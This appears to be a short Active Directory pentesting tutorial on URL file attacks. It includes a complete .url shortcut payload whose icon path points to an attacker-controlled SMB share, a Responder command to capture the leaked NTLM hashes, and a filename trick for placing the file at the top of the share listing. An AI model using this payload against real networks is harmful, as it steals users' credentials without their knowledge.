Attacks - Active Directory Hacking
URL File Attacks
What are URL File Attacks?
URL File Attacks are a type of attack that uses URLs to deliver malicious files. These files can be used to gain access to a system or network.
How it works?
- Attacker creates a file with a malicious payload
- Attacker add his own URL to the file
- Attacker sends the file to the victim via email or smb share or any other way
- Victim opens the file and the payload is executed
- Payload can be used to gain access to the system or network
Demo Time
first we need to create a file with a malicious payload saved as @test.url or ~test.url:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<Attacker IP>\%USERNAME%.icon
IconIndex=1
Why we used ~ or @?
Because this insures that the file to be at the top of the directory listing.
Letโs start our responder:
sudo responder -I tun0 -v
Once the user visits the share the payload is in, itโs over! We got his hash!